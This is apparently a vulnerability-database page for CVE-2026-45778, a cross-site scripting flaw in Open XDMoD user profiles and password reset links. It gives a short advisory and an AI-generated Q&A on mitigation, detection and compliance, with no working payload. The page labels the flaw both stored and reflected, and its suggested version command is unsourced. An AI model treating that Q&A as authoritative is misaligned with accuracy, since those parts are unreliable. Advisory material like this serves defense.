CVE-2026-45778
Stored XSS in OpenXDMoD User Profile
Publication date: 2026-06-05
Last updated on: 2026-06-05
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| openxdmod | openxdmod | to 11.0.3 (exc) |
| ubccr | open_xdmod | to 11.0.3 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately upgrade Open XDMoD to version 11.0.3 or later, where the issue has been patched.
If upgrading is not possible right away, apply the provided manual patch as a temporary workaround to fix the vulnerability.
Can you explain this vulnerability to me?
CVE-2026-45778 is a Reflected Cross-Site Scripting (XSS) vulnerability in the password reset functionality of Open XDMoD versions prior to 11.0.3.
An authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and then abuse the password reset feature to send a crafted link to a victim.
When the victim clicks the link, the malicious JavaScript executes in their browser because the payload is not properly sanitized, potentially leading to credential theft and account takeover.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves an authenticated attacker injecting malicious JavaScript into their Open XDMoD user profile and exploiting the password reset functionality to send a crafted link. Detection would involve monitoring for unusual or suspicious password reset emails containing unexpected or suspicious URLs.
Since the vulnerability is a reflected Cross-Site Scripting (XSS) issue triggered via crafted password reset links, network detection could include inspecting outgoing password reset emails for suspicious payloads or JavaScript code embedded in URLs.
On the system side, commands to check the Open XDMoD version can help determine if the system is vulnerable (versions prior to 11.0.3 are affected). For example, checking the installed package version or the application version via command line or web interface.
- Check Open XDMoD version to confirm if it is prior to 11.0.3 (vulnerable):
- Use a command like `xdmod --version` or check the version in the application UI or installation directory.
- Monitor outgoing emails for password reset links containing suspicious JavaScript payloads.
- Review user profiles for injected JavaScript code if possible.
No specific detection commands or scripts are provided in the available resources.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in Open XDMoD allows an authenticated attacker to inject malicious JavaScript that can lead to credential theft and account takeover. This impacts the confidentiality and integrity of user data.
Such a compromise of user credentials and potential unauthorized access to accounts could lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access.
Therefore, if exploited, this vulnerability could negatively affect compliance with these common standards by exposing sensitive user data and failing to maintain adequate security controls.
How can this vulnerability impact me? :
This vulnerability can lead to the compromise of your Open XDMoD account through credential capture.
An attacker can take over your account by tricking you into clicking a malicious link that executes injected JavaScript in your browser.
The impact affects the confidentiality and integrity of your account data, but does not affect system availability.